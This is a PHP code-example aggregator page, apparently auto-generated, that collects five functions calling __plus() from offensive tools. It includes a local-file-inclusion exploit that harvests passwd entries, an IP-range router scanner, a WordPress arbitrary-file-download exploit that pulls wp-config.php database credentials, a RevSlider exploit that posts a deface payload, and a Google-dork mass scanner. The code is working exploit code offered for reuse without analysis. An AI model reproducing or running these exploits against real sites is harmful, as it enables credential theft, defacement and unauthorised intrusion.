__plus PHP代码示例

示例#1

0

显示文件

文件： lfiINURL.php 项目： serbyy/lfiINURL

function main($config, $rest)
{
    __plus();
    print "[ " . date("h:m:s") . " ] [!][EXPLOITATION THE FILE]:{$config['file']}\n";
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
    $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
    $res = NULL;
    if (preg_match("#root#i", $rest['corpo'])) {
        $res .= "[ " . date("h:m:s") . " ] [+][IS VULN][RESUME][VALUES]:\n";
        $res .= $config['line'] . "\n";
        foreach ($_final as $value) {
            $res .= "[ " . date("h:m:s") . " ] [VALUE]: {$value}\n";
        }
        $res .= $config['line'];
        __plus();
        file_put_contents('lfi.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: lfi.txt\n\n";
        exit;
    } else {
        print "[ " . date("h:m:s") . " ] [x][NOT VULN]\n";
    }
}

示例#2

0

显示文件

文件： RouterHunterBR.php 项目： az0ne/RouterHunterBR

function main($params)
{
    //IMPLEMENTATION HOME
    echo __banner("{$_SESSION["c13"]}{$params['line']}{$_SESSION["c00"]}", 1);
    echo "{$_SESSION["c01"]}Starting SCANNER RouterHunterBR 1.0 at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c09"]}\n[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program{$_SESSION["c00"]}\n\n";
    if ($params['op'] == 0) {
        //WORKING WITH IPS ON TRACK
        for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) {
            __plus();
            __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}");
            __plus();
        }
        for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) {
            __plus();
            __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}");
            __plus();
        }
        for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) {
            __plus();
            __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}");
            __plus();
        }
        for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) {
            __plus();
            __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}");
            __plus();
        }
    } elseif ($params['op'] == 1) {
        //WORKING WITH IP RANDOM
        !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL;
        for ($i = 0; $i <= $params['limit-ip']; $i++) {
            __subProcess($params, __getIPRandom());
            __plus();
        }
    } elseif ($params['op'] == 2) {
        //IP WORK SOURCE FILE
        !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL;
        __plus();
        foreach ($params['file'] as $value) {
            __subProcess($params, $value);
            __plus();
        }
    }
}

示例#3

0

显示文件

文件： Wordpress-A.F.D-Verification.1.0.php 项目： 0x90shell/Wordpress-A.F.D-Verification

function __request($url, $plugin)
{
    $objcurl = curl_init();
    $caminho = NULL;
    $status = array();
    curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 10);
    $corpo = curl_exec($objcurl);
    if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
        return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
    }
    __plus();
    if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
        //-----------------------------------------------------------------------------
        preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
        preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
        preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
        preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
        preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
        #FILE PASSWORD
        preg_match_all("(root:.*)", $corpo, $status['pwd1']);
        preg_match_all("(sbin:.*)", $corpo, $status['pwd2']);
        preg_match_all("(ftp:.*)", $corpo, $status['pwd3']);
        preg_match_all("(nobody:.*)", $corpo, $status['pwd4']);
        preg_match_all("(mail:.*)", $corpo, $status['pwd5']);
        //-----------------------------------------------------------------------------
        __plus();
        $res = "\n------------------------------------------------------------------------------------------------------------------\n[0;32m0x " . date("h:m:s") . " [INFO][VULN]::    [1;37m [ " . date("d-m-Y H:i:s") . " ]\n";
        $res .= "[0;32m0x " . date("h:m:s") . " [INFO][VULN][DB]::[1;37m " . $status['DB_NAME'][0][0];
        $res .= "::" . $status['DB_USER'][0][0];
        $res .= "::" . $status['DB_PASSWORD'][0][0];
        $res .= "::" . $status['DB_HOST'][0][0];
        $res .= "::" . $status['DB_CHARSET'][0][0];
        $res .= preg_match("#root#i", $corpo) ? "\n[0;32m0x " . date("h:m:s") . "[INFO][VULN][FILE_PASSWORD]::[1;37m{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}[0m" : NULL;
        $res .= "\n[0;32m0x " . date("h:m:s") . " [INFO][VULN][URL]::[1;37m{$url}{$plugin}[0m";
        $res .= "\n------------------------------------------------------------------------------------------------------------------\n[0m";
        print $res;
        $res = str_replace('[1;37m', '', str_replace('[0m', '', str_replace('[0;32m', '', $res)));
        file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
        __plus();
    } else {
        print "\n[1;31m0x " . date("h:m:s") . " [INFO][NOT VULN]::[1;37m {$url}{$plugin} \n[0m";
    }
    curl_close($objcurl);
    __plus();
}

示例#4

0

显示文件

文件： xplRslide.php 项目： 523brain/WORDPRESS-Revslider-Exploit-0DAY

function __request($__)
{
    $curlxpl = curl_init();
    curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
    !is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL;
    curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
    curl_setopt($curlxpl, CURLOPT_POST, 1);
    curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => $__['deface']));
    curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
    curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
    $result = curl_exec($curlxpl) . __plus();
    if (eregi('true', $result)) {
        $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
        echo "[!] [INFO] Success Exploit!\n";
        echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
        __plus();
        file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
    } else {
        echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
    }
    curl_close($curlxpl);
    unset($curlxpl);
}

示例#5

0

显示文件

文件： inurlbr.php 项目： iambrosie/Sn1per

function __main($dork, $motor, $cod)
{
    $dork_[0] = strstr($dork, '[DORK]') ? explode('[DORK]', $dork) : array($dork);
    $dork_[1] = not_isnull_empty($_SESSION['config']['dork-file']) ? __openFile($_SESSION['config']['dork-file'], 1) : $dork_[0];
    $dork_[2] = not_isnull_empty($_SESSION['config']['dork-rand']) ? __randomDork($_SESSION['config']['dork-rand']) : array();
    $dork_[3] = array_filter(array_unique(array_merge($dork_[0], $dork_[1], $dork_[2])));
    $file_proxy = not_isnull_empty($_SESSION['config']['proxy-file']) ? __openFile($_SESSION['config']['proxy-file'], 1) : NULL;
    $list_proxy = is_array($file_proxy) ? $file_proxy : NULL;
    print __bannerLogo();
    __startingBanner();
    for ($i = 0; $i <= count($dork_[3]); $i++) {
        if (!empty($dork_[3][$i])) {
            echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ DORK ]::{$_SESSION["c1"]}[ {$dork_[3][$i]} ]\n";
            //$objNewSearch = create_function('$dork_, $motor, $list_proxy', $cod);
            //$objNewSearch(urlencode($dork_[3][$i]), $motor, $list_proxy);
            __engines(urlencode($dork_[3][$i]), $list_proxy) . __plus();
            $_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
            $_SESSION["config"]["pr"] ? $_SESSION["config"]["totas_urls"] = NULL : NULL;
            echo "\n";
        }
    }
    !$_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
    __exitProcess();
}

PHP __plus示例